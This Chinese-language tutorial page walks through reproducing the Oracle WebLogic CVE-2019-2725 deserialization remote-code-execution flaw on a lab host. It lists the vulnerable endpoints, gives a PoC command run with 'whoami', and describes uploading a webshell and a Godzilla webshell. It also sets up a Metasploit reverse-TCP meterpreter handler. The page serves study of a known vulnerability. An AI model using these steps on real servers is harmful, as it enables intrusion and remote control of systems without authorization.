栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

weblogic反序列化漏洞复现( CVE-2019-2725)

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

weblogic反序列化漏洞复现( CVE-2019-2725)

文章目录
      • 漏洞名称
      • 漏洞编号
      • 漏洞描述
      • 影响版本
      • 漏洞存在
      • 复现
        • 第一步 访问控制台
        • 第二步 使用weblogicScan进行扫描,发现存在该漏洞
      • 漏洞复现一(poc)
        • 执行命令:
        • 上传webshell
      • 漏洞复现二
        • 下载地址
        • 漏洞检查
        • 命令执行
        • 上传哥斯特马,并进行连接
        • 哥斯特与msf联动
      • 笔记下载
      • 免责声明

漏洞名称
  • weblogic反序列化远程命令执行漏洞
漏洞编号
  • CVE-2019-2725
漏洞描述
  • CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,

  • 这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,

  • 通过针对Oracle官网历年来的补丁构造payload来绕过。

影响版本
  • weblogic 10.x
  • weblogic 12.1.3
漏洞存在
/_async/AsyncResponseService
/_async/AsyncResponseServiceJms
/_async/AsyncResponseServiceHttps
/_async/AsyncResponseServiceSoap12
/_async/AsyncResponseServiceSoap12Jms
/_async/AsyncResponseServiceSoap12Https

http://192.168.253.143:7001/_async/AsyncResponseService

http://192.168.253.143:7001/_async/# 返回403则存在,返回404则不存在

复现 第一步 访问控制台

http://192.168.253.143:7001/console/login/LoginForm.jsp

第二步 使用weblogicScan进行扫描,发现存在该漏洞

漏洞复现一(poc) 执行命令:

python weblogic-2019-2725.py 10.3.6 http://192.168.253.143:7001 whoami


上传webshell



漏洞复现二 下载地址

https://github.com/shack2/javaserializetools/releases/tag/1.0.20190828

漏洞检查

命令执行

上传哥斯特马,并进行连接



哥斯特与msf联动
kali中msfconsole
use exploit/multi/handler
set payload  /java/meterpreter/reverse_tcp
set lhost
set lport
run


笔记下载

https://download.csdn.net/download/qq_41901122/54162206

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/631056.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号